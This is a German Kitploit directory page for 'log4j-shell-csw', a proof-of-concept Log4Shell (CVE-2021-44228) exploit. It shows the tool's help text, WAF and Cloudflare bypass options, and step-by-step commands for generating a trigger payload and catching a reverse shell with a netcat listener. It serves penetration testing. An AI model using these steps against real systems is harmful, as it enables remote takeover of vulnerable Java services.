Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j-shell-csw — Ein Proof-of-Concept-Exploit für die CVE-2021-44228-Schwachstelle. | Kitploit
Tools/GitHubGitHub/cybersecurityworks553/log4j-shell-csw
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungCommand and Control
GitHubcybersecurityworks553/log4j-shell-csw

log4j-shell-csw

Ein Proof-of-Concept-Exploit für die CVE-2021-44228-Schwachstelle.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
82vor 4 JahrenNoch nicht geprüft

Log4j Einfacher Exploit

Ein Proof-of-Concept-Exploit für die CVE-2021-44228-Schwachstelle.

Log4j, das zur Protokollierung von Sicherheits- und Leistungsinformationen verwendet wird, betrifft mehr als 3 Milliarden Geräte, die Java in einer Vielzahl von Verbraucher- und Unternehmensdiensten, Websites und Anwendungen sowie medizinischen Geräten und unterstützenden Systemen nutzen.
Hinweis: Dies ist kein „Point-and-Click“-Exploit. Der initiale Trigger-Payload wird generiert, aber das Einfügen an geeigneter Stelle (z.B. HTTP-Header/Chat/usw.) liegt beim Benutzer.

Voraussetzungen

  • python3
  • pip install -r requirements.txt
  • Installiere jdk1.8.0_20 und füge den bin-Ordner zur Umgebungsvariable hinzu
root@kitploit:~
usage: python CVE-2021-44228-exploit.py --help 
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]

log4shell Reverse shell exploit

optional arguments:
  -h, --help            show this help message and exit
  --userip userip       Enter IP for LDAPRefServer & Shell
  --webport webport     listener port for HTTP port
  --lport lport         Netcat Port
  -b bypass, --bypass bypass
                        Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
                        ${lower:x} method restriction bypass
Beispiel:
  1. Führe das Skript für Linux-Betriebssystem mit Bypass-Payload der Methode aus
root@kitploit:~
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods

2) Führe netcat auf Port 9001 auf deinem lokalen Rechner aus

root@kitploit:~
nc -lvnp 9001
  1. Kopiere den 'Try me'-Payload, um Methodenrestriktionen zu umgehen, und verwende ihn als Eingabevariable, um eine Shell in netcat zu erhalten
    Hinweis: Wenn kein Bypass gewählt wird, verwende den 'Send me'-Payload

Referenzen

  • https://akashpatil.me/log4j-guide-book.html
  • https://github.com/kozmer/log4j-shell-poc
Tool herunterladen